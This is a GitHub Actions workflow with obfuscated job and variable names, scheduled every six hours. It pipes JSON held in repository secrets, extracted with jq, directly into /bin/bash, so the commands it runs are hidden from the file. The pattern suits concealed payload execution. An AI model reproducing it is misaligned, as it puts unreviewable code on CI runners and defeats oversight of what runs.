name: dangnianqing4321
on:
  workflow_dispatch:
  schedule:
    - cron: '18 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dangnianqing4321
        env:
          uhp6335: ${{ secrets.uhp6335 }}
        run: |
          echo $uhp6335 | jq -r .ijg449 | /bin/bash
          echo $tpcxc755 | jq -r .no055 | /bin/bash
          echo $kqq919 | jq -r .q36 | /bin/bash

